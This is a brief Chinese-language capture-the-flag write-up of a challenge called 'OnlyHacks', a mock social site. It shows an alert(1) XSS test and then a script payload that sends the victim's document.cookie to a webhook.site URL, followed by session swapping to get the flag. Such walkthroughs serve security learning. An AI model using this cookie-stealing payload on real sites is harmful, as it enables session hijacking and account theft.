OnlyHacks
一個超詭異的社交網站
就先來註冊一下
真的感覺超詭異的,我是全部按讚拉

沒想到可以直接alert出來? <script>alert(1)</script>
那我就直接偷他cookie
<script> fetch("https://webhook.site/5044eec5-2a49-4e50-82af-f91c57344da0?cookie=" + document.cookie);</script>
cookie get!
直接把session換掉
flag就出來了
Thanks for reading!